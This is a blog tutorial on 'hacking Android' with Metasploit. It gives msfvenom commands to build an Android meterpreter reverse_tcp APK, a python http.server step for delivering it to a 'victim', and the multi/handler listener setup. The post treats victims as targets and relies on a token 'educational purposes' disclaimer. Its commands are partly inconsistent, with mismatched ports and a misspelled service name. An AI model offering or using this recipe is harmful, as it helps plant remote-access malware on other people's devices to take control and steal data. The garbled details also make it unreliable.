Hacking Android using Metasploit Virus
Hello, today we are going to use viruses to hack android devices. We are
going to use a tool named Metasploit to hack android devices.
What is Metasploit?
Metasploit is a tool that is
developed by HD Moore in the year 2003
and now it is maintained by Rapid7. Metasploit is an
open source this is used by cyber
security experts and Cybercriminals to find exploits in Targeted victims' devices. This tool is mainly used by Cyber security experts for Performing
penetration testing and vulnerability assessment. But this tool is also used by cybercriminals to steal sensitive information and perform various attacks on the victim's devices.
Metasploit have a large community of users and developers who contribute to its development constantly and also they add new module and exploit them to make this tool more functional. Metasploit can create a payload. Payload is just like a virus, You can create payload for various platforms such as Android, Mac, and Linux. Metasploit also has Auxiliary useful to perform Port scanning, Vulnerability scanning and etc. It also has encoders To protect your app from Anti-Virus.
This tool has a range of tools for testing the Targeted system :
Payload Generators: This tool can create a payload to Perform attacks like Stealing information, Installing backdoors, Taking control of the system, and so on.
Database for exploit: It haves a large collection of exploits which helps it to attack systems in various ways.
Modules: The module consists of a collection of tools and scripts that is useful for automating tasks.
MeterPreter: It is an interactive shell that is used to perform various tasks on the victim's system.
Now we are going to create Payload for Android:
It is pre-installed in the Linux system to check it
msfvenom -h
msfvenom is a Standalone payload generator and -h use shows the list of
various commands.
We are going to perform this attack on LAN (Local Area Network)
msfvenom -p android/meterpreter/reverse_tcp lhost= (your local ip) lport=4444 > (name of apk)
-p - to create a payload.
android - the platform. (you can type any platform you want)
meterpreter - part of the payload, It provides you a multi-functional
shell.
reverse_tcp - used to create reverse tcp payload.
lhost - the local IP, type ifconfig to get your local IP address (in my
case it 10.0.2.15)
lport - give any local port number
> - after this symbol give the name of the app ( I give Payload.apk)
After pressing enter it creates an apk containing reverse_tcp Payload. Now
send that apk to the victim, Whenever our victim executes this apk. Send
it by creating a link or another way. To host this simple type,
python3 -m http.server 8080
It works as provide a service you can directly send to your victim's
device. like
http://10.0.2.15:8080/Payload.apk
It automatically starts to download apk download. Install it on the victim's
device. Then you need to start the listener for that stop that server we
start using Ctrl+c.
Now start the listener using
sudo service postsql start
To start Metasploit use
msfconsole
After it started create a listener by typing
use exploit/multi/handler
It changes the path now creates the payload using
set payload android/meterpreter/reverse_tcp
Then set the lhost and lport
set lhost 10.0.2.15
set lport 8080
Now type
run
to start the reverse TCP handler
We are going to cover Commands in our next blog
NOTE: We created this post only for educational purposes! computertipstricks.tech or author of post are not responsible for any suspicious activity of audiences. 👀
Hope this post will help you to know more about Hacking using Android!
Thank You…!!!!!!
0 Comments
Please do not add Any Spam link in Comments !